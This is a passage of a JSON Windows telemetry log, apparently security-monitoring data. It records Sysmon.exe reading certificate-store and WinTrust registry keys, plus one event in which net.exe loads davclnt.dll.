"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570909810016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570909960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "davclnt.dll", - "image_path": "C:\\Windows\\System32\\davclnt.dll", - "pid": 6292, - "process_name": "net.exe", - "process_path": "C:\\Windows\\System32\\net.exe", - "timestamp": 131883570909650000, - "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570910119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - 